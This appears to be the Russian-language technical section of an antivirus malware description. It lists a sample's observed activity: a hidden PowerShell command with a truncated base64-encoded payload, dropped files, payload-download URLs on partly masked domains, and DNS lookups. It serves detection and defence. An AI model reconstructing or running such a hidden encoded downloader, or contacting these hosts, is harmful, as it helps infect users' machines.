Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -w hidden -en JABBAHEAbQBiAGwAZgBpAGYAcAA9ACcARQBsAGEAYQBvAHUAcABkAHIAJwA7ACQAWAB0AHkAawBrAGUAbAB1AGgAdQB1AGoAeQAgAD0AIAAnADcAOAAxACcAOwAkAEgAdAB3AG4AawBoAHkAagBpAD0AJwBNAG0AbAB5AHAAcwBwAG4AaQB...
- '%CommonProgramFiles%\Microsoft Shared\DW\DW20.EXE' -x -s 1564
- %TEMP%\1099276.cvr
- %HOMEPATH%\781.exe
- 'ed####llireland.com':80
- 'ne####nterhyde.com':80
- http://ed####llireland.com/webalizer/HFNiT9365/
- http://ne####nterhyde.com/HappyWellBe/Ld728989/
- http://www.ne####nterhyde.com/HappyWellBe/Ld728989/
- DNS ASK du######gcubatdongsan.com
- DNS ASK eb#####skinnganjuk.com
- DNS ASK de#####ogenajans.com
- DNS ASK ed####llireland.com
- DNS ASK ne####nterhyde.com
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -w hidden -en JABBAHEAbQBiAGwAZgBpAGYAcAA9ACcARQBsAGEAYQBvAHUAcABkAHIAJwA7ACQAWAB0AHkAawBrAGUAbAB1AGgAdQB1AGoAeQAgAD0AIAAnADcAOAAxACcAOwAkAEgAdAB3AG4AawBoAHkAagBpAD0AJwBNAG0AbAB5AHAAcwBwAG4AaQB...' (со скрытым окном)